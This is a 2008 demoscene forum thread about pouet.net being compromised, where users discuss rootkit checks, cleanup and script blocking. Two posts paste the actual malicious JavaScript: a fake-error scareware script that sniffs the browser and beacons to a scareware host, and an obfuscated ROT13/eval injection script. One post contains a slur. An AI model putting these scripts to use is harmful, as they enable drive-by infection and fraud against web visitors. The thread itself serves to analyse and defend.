pouët.net

POUET.NET is hacked / infected with a javascript worm

category: general [glöplog]
ryg: thanks for telling that. i think neither my work pc nor my home pc are infected in that case. so, still leaves me there wondering how the hell the pain sites was hacked then?
added on the 2008-02-04 19:44:38 by unlock unlock
i was pretty shocked to see some suspicious output by GMER, but later i figured out that DISABLING antivir is not enough, you need to uninstall it. after that GMER could not find anything.

a listing of a "positive" GMER output would have been quite helpful, i suffered two late hours of painful doubt. checking the bootblock would not help in my case because its a grub.
added on the 2008-02-04 20:34:04 by chaos chaos
gmer lists all the drivers hooking under the windows kernel, like rootkits but also antivirus, cd emulators like daemon tools, encryption layers like drivecrypt, disk imaging tools like true image, etc...
added on the 2008-02-04 20:56:56 by Zest Zest
yeh, but i actually tells if it finds a known rootkit, or does it just lust and let the user suffer from doubts? :)
added on the 2008-02-04 21:37:51 by unlock unlock
it marks everything truly suspicious as red.
added on the 2008-02-04 21:41:41 by ryg ryg
By the way, for those who got the MBR rootkit in, you need to use fixmbr only from a CD and not from the recovery console booted from the hdd. (For obvious reasons, the rootkit does not want you to overwrite it ;)
added on the 2008-02-04 21:46:24 by _-_-__ _-_-__
A friend of mine helped me analyzing the different MBRs and they all seem to be "normal"... also, i can't find anything in sector 60-62, so there's probably no MBR-Rootkit (and hopefully no other rootkit) - Did anybody notice changes in his system (Popups etc.) which are stated on different websites?
It was the valves-wholesale guy!
added on the 2008-02-05 02:05:13 by red red
hmm it works only on winxp sp2?

Code: is_XP_SP2 = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1)); is_IE=false; if (navigator.appName.toLowerCase()=='microsoft internet explorer') { if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) { is_IE=true; } } is_opera = (navigator.userAgent.indexOf("opera") != -1); is_mac = (navigator.userAgent.indexOf("mac") != -1); is_mac_ie = (is_IE && is_mac); is_win_ie = (is_IE && !is_mac); is_gecko = (navigator.product == "Gecko"); function OkClicked(){ } if(is_XP_SP2) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"); } function onLoadPage() { bResult = confirm('Multiple System Errors Detected. Click OK To Fix'); if (bResult) { OkClicked(); document.location.href(""); } } var redirect_ad = 'keyin_tbn_nl_en'; var redirect_link = 'keyin'; function check_cookies() { document.cookie="foo=test; path=/; expires=Mon, 31-Dec-2007 00:00:00 GMT"; myVar = getCookie("foo"); if (myVar == "test") { Img = new Image(); Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=1'; } else { Img = new Image(); Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=2'; } } function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset) if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return(setStr); } check_cookies();


strange stuffs..
added on the 2008-02-05 21:39:04 by the_Ye-Ti the_Ye-Ti
What's that ?

Checking the user agent is just plain wrong. Browsers have been faking it for years!

The classId 6BF52A52-394A-11D3-B153-00C04F79FAA6 refers to Windows Media Player 7 and there seem to be a bunch of exploit with it to load/executre arbitrray files
added on the 2008-02-05 21:53:15 by p01 p01
I mean, where did you get that script ?
added on the 2008-02-05 22:00:44 by p01 p01
When I was redirected to: redirect to http://e.pepato.org/e/adsr.php?t=0 it turned out to be someone had hacked the server and altered to webpage with the following code:

Code:<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>


Pretty annoying, but easy to fix.
Well, that's why I use firefox with no-script installed. Nobody getting through that way without my permission!
added on the 2008-02-11 23:56:15 by arfink arfink
don't need Firefox and an extension to disable scripting, but hey whatever makes you feel safe.

Even in IE scripting can be disabled.
added on the 2008-02-12 00:14:27 by p01 p01
Does that MBR faggotery affect GRUB or is it just the windows MBR thingy?
added on the 2008-02-12 00:19:49 by xernobyl xernobyl
Hey, IE's anti script is not under your direct on-the-fly control like NoScript is. NoScript does alot more than JavaScript too, look it up. It's one of my favourite damage control tools for web browsing, because it's fast, not annoying, and easy to use.
added on the 2008-02-12 00:23:46 by arfink arfink
Oh, and I'm not Winblowz either...
added on the 2008-02-12 00:24:26 by arfink arfink
arfink, you must be very rad
added on the 2008-02-12 00:41:43 by imbusy imbusy
Well, maybe it would be simpler just to block all Javascript which had a call to 'eval' in it.
Lord Graga: some antivirus do check that for you by parsing every HTTP traffic (i'm using Kaspersky for example).
added on the 2008-02-12 05:11:44 by Zest Zest
Lord Graga: or Function( "somecode") or setTimeout( "somecode", delay ) or setInterval( "somecode", delay )
added on the 2008-02-12 07:22:22 by p01 p01
@all: thanks for this information
I'm not infected
I use FF with QuickJava Button
NoScript sometimes causes task freezes on FF
added on the 2008-02-12 12:11:13 by seρρjο seρρjο
@ClassicCan,
got this, too. Posted in "fix me beautiful". Which Server? Was not able to find it that time.
added on the 2008-02-12 12:55:51 by seρρjο seρρjο
p01: who doesn't use that in WEB2.0 dev? =)
added on the 2008-02-12 13:47:36 by Hatikvah Hatikvah
confused:
http://pouet.net/topic.php?which=1024&page=378
first time I got redirected was 17.01.2007 (see link) and nobody had any reaction here.
stijn also had the same problem. Isn't it the same piece of code?
Actually found nothing with gmer.
added on the 2008-02-12 14:38:11 by seρρjο seρρjο

login